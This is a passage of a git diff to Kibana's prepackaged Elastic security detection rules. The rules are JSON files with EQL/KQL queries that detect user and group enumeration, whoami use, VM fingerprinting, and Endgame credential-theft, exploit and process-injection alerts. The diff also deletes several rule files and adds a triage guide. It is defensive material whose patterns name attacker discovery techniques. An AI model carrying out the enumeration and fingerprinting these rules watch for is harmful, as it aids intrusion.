"Continuous Monitoring", + "Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1613", + "name": "Container and Resource Discovery", + "reference": "https://attack.mitre.org/techniques/T1613/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json index 7152bb4c93d3d..aaccb3f6163ee 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_users_domain_built_in_commands.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the execution of macOS built-in commands related to account or group enumeration.", + "description": "Identifies the execution of macOS built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act.", "from": "now-9m", "index": [ "auditbeat-*", @@ -11,10 +11,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Users or Groups via Built-in Commands", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n not process.parent.executable : (\"/Applications/NoMAD.app/Contents/MacOS/NoMAD\", \n \"/Applications/ZoomPresence.app/Contents/MacOS/ZoomPresence\",\n \"/Applications/Sourcetree.app/Contents/MacOS/Sourcetree\",\n \"/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\",\n \"/Applications/Jamf Connect.app/Contents/MacOS/Jamf Connect\",\n \"/usr/local/jamf/bin/jamf\"\n ) and \n process.name : (\"ldapsearch\", \"dsmemberutil\") or\n (process.name : \"dscl\" and \n process.args : (\"read\", \"-read\", \"list\", \"-list\", \"ls\", \"search\", \"-search\") and \n process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\"))\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : (\"ldapsearch\", \"dsmemberutil\") or\n (process.name : \"dscl\" and\n process.args : (\"read\", \"-read\", \"list\", \"-list\", \"ls\", \"search\", \"-search\") and\n process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\"))\n\t) and\n not process.parent.executable : (\"/Applications/NoMAD.app/Contents/MacOS/NoMAD\",\n \"/Applications/ZoomPresence.app/Contents/MacOS/ZoomPresence\",\n \"/Applications/Sourcetree.app/Contents/MacOS/Sourcetree\",\n \"/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon\",\n \"/Applications/Jamf Connect.app/Contents/MacOS/Jamf Connect\",\n \"/usr/local/jamf/bin/jamf\",\n \"/Library/Application Support/AirWatch/hubd\",\n \"/opt/jc/bin/jumpcloud-agent\",\n \"/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon\",\n \"/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon\",\n \"/Library/PrivilegedHelperTools/com.fortinet.forticlient.uninstall_helper\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json index 09adcdc65b02a..b8b22c1db44bc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting.json @@ -15,6 +15,28 @@ "license": "Elastic License v2", "name": "Virtual Machine Fingerprinting", "query": "event.category:process and event.type:(start or process_started) and\n process.args:(\"/sys/class/dmi/id/bios_version\" or\n \"/sys/class/dmi/id/product_name\" or\n \"/sys/class/dmi/id/chassis_vendor\" or\n \"/proc/scsi/scsi\" or\n \"/proc/ide/hd0/model\") and\n not user.name:root\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "5b03c9fb-9945-4d2f-9568-fd690fee3fba", "severity": "high", @@ -44,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json index 009cdf49ab28b..59ab4b117e62a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_virtual_machine_fingerprinting_grep.json @@ -14,13 +14,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Virtual Machine Fingerprinting via Grep", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.name in (\"grep\", \"egrep\") and user.id != \"0\" and\n process.args : (\"parallels*\", \"vmware*\", \"virtualbox*\") and process.args : \"Manufacturer*\" and \n not process.parent.executable in (\"/Applications/Docker.app/Contents/MacOS/Docker\", \"/usr/libexec/kcare/virt-what\")\n", + "note": "", + "query": "process where event.type == \"start\" and\n process.name in (\"grep\", \"egrep\") and user.id != \"0\" and\n process.args : (\"parallels*\", \"vmware*\", \"virtualbox*\") and process.args : \"Manufacturer*\" and\n not process.parent.executable in (\"/Applications/Docker.app/Contents/MacOS/Docker\", \"/usr/libexec/kcare/virt-what\")\n", "references": [ "https://objective-see.com/blog/blog_0x4F.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json index 1ec25bb00b392..b4363af45722e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_whoami_command_activity.json @@ -16,10 +16,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Whoami Process Activity", - "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current\nprivileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current\nprivileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"whoami.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +60,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/domain_added_to_google_workspace_trusted_domains.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/domain_added_to_google_workspace_trusted_domains.json deleted file mode 100644 index 26d8afd697d00..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/domain_added_to_google_workspace_trusted_domains.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a domain is added to the list of trusted Google Workspace domains. An adversary may add a trusted domain in order to collect and exfiltrate data from their target\u2019s organization with less restrictive security controls.", - "false_positives": [ - "Trusted domains may be added by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Domain Added to Google Workspace Trusted Domains", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_TRUSTED_DOMAINS\n", - "references": [ - "https://support.google.com/a/answer/6160020?hl=en" - ], - "risk_score": 73, - "rule_id": "cf549724-c577-4fd6-8f9b-d1b8ec519ec0", - "severity": "high", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json index 63bf6fea698ae..c203110a79cd5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/elastic_endpoint_security.json @@ -21,6 +21,18 @@ "max_signals": 10000, "name": "Endpoint Security", "query": "event.kind:alert and event.module:(endpoint and not endgame)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 47, "risk_score_mapping": [ { @@ -64,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json index abe19ac7e0a69..cca6142f3e4b8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_adversary_behavior_detected.json @@ -13,6 +13,28 @@ "max_signals": 10000, "name": "Adversary Behavior - Detected - Elastic Endgame", "query": "event.kind:alert and event.module:endgame and (event.action:rules_engine_event or endgame.event_subtype_full:rules_engine_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "77a3c3df-8ec4-4da4-b758-878f551dee69", "severity": "medium", @@ -21,5 +43,5 @@ "Elastic Endgame" ], "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_detected.json deleted file mode 100644 index d08d5cdc79ba0..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_detected.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame detected Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Credential Dumping - Detected - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n", - "risk_score": 73, - "rule_id": "571afc56-5ed9-465d-a2a9-045f099f6e7e", - "severity": "high", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_prevented.json deleted file mode 100644 index 48159cfc3a07f..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_dumping_prevented.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame prevented Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Credential Dumping - Prevented - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n", - "risk_score": 47, - "rule_id": "db8c33a8-03cd-4988-9e2c-d0a4863adb13", - "severity": "medium", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_detected.json deleted file mode 100644 index 30a94c67f9999..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_detected.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame detected Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Credential Manipulation - Detected - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n", - "risk_score": 73, - "rule_id": "c0be5f31-e180-48ed-aa08-96b36899d48f", - "severity": "high", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_prevented.json deleted file mode 100644 index cbacfb8310a93..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_cred_manipulation_prevented.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Credential Manipulation - Prevented - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n", - "risk_score": 47, - "rule_id": "c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa", - "severity": "medium", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_detected.json deleted file mode 100644 index 51151f3ad264f..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_detected.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame detected an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Exploit - Detected - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n", - "risk_score": 73, - "rule_id": "2003cdc8-8d83-4aa5-b132-1f9a8eb48514", - "severity": "high", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_prevented.json deleted file mode 100644 index 44e13fc83f15a..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_exploit_prevented.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame prevented an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Exploit - Prevented - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n", - "risk_score": 47, - "rule_id": "2863ffeb-bf77-44dd-b7a5-93ef94b72036", - "severity": "medium", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json index 7e375f9aca154..60d6ee9fddaf0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_detected.json @@ -13,6 +13,33 @@ "max_signals": 10000, "name": "Malware - Detected - Elastic Endgame", "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:file_classification_event or endgame.event_subtype_full:file_classification_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 99, "rule_id": "0a97b20f-4144-49ea-be32-b540ecc445de", "severity": "critical", @@ -21,5 +48,5 @@ "Elastic Endgame" ], "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json index b26a0ab2eedb7..03794ebcc170c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_malware_prevented.json @@ -13,6 +13,33 @@ "max_signals": 10000, "name": "Malware - Prevented - Elastic Endgame", "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:file_classification_event or endgame.event_subtype_full:file_classification_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3b382770-efbb-44f4-beed-f5e0a051b895", "severity": "high", @@ -21,5 +48,5 @@ "Elastic Endgame" ], "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_detected.json deleted file mode 100644 index 3ecfb461d2c49..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_detected.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame detected Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Permission Theft - Detected - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n", - "risk_score": 73, - "rule_id": "c3167e1b-f73c-41be-b60b-87f4df707fe3", - "severity": "high", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_prevented.json deleted file mode 100644 index 7f1853af6910c..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_permission_theft_prevented.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame prevented Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Permission Theft - Prevented - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n", - "risk_score": 47, - "rule_id": "453f659e-0429-40b1-bfdb-b6957286e04b", - "severity": "medium", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_detected.json deleted file mode 100644 index 8018ba8027bb7..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_detected.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame detected Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Process Injection - Detected - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n", - "risk_score": 73, - "rule_id": "80c52164-c82a-402c-9964-852533d58be1", - "severity": "high", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_prevented.json deleted file mode 100644 index c8fa9f26e7c71..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_process_injection_prevented.json +++ /dev/null @@ -1,25 +0,0 @@ 